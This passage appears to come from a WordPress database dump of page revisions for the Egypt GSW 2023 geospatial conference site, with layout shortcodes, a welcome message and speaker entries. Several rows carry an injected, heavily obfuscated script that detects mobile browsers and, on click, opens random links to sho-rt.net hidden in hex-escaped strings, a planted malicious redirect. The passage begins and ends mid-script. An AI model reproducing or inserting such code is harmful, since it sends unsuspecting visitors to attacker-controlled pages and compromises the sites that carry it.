)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-12-06 05:21:27','2022-12-06 05:21:27','',2876,'https://gsw2023.com/?p=3424',0,'revision','',0),
(3425,1,'2022-12-06 05:22:09','2022-12-06 05:22:09','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-12-06 05:22:09','2022-12-06 05:22:09','',2876,'https://gsw2023.com/?p=3425',0,'revision','',0),
(3426,1,'2022-12-06 05:50:19','2022-12-06 05:50:19','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkNhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUwQSUwQUFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMFRoZSUyMEdTVyUyMHdpbGwlMjBwcm92aWRlJTIwYSUyMHBsYXRmb3JtJTIwZm9yJTIwaW50ZXJuYXRpb25hbCUyMHNjaG9sYXJzJTJDJTIwZ3JhZHVhdGUlMjBzdHVkZW50cyUyQyUyMGZ1dHVyZSUyMHNjaWVudGlzdHMlMjBhbmQlMjBpbmR1c3RyaWFsJTIwc2VjdG9ycyUyMHRvJTIwbGVhcm4lMjBleGNoYW5nZSUyMGtub3dsZWRnZSUyMGFuZCUyMGV4cGVyaWVuY2VzJTIwb2YlMjBhcHBseWluZyUyMGdlb3NwYXRpYWwlMjB0ZWNobm9sb2dpZXMlMjBmb3IlMjBzdXN0YWluYWJsZSUyMGRldmVsb3BtZW50JTIwZm9yJTIwYmV0dGVyJTIwcXVhbGl0eSUyMG9mJTIwbGlmZSUyMGZvciUyMHBlb3BsZSUyMGFyb3VuZCUyMHRoZSUyMHdvcmxkLiUwQSUwQVdlJTIwd291bGQlMjBsaWtlJTIwdG8lMjB0YWtlJTIwdGhpcyUyMG9wcG9ydHVuaXR5JTIwdG8lMjB3ZWxjb21lJTIweW91JTIwdG8lMjBDYWlybyUyMGElMjB2aWJyYW50JTJDJTIwZXhoaWxhcmF0aW5nJTJDJTIwZXhvdGljJTJDJTIwZmFzY2luYXRpbmclMjBhbmQlMjB3ZWxjb21pbmclMjBjaXR5LiUyMEhvbWUlMjB0byUyMHRoZSUyMGJlc3QlMjBQaGFyYW9uaWMlMkMlMjBDb3B0aWMlMjBhbmQlMjBJc2xhbWljJTIwc2lnaHRzJTIwaW4lMjBFZ3lwdC4lMjBDYWlybyUyMGlzJTIwd2hlcmUlMjB5b3UlMjBuZXZlciUyMGtub3clMjB3aGF0JTIwaW5jcmVkaWJsZSUyQyUyMEFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 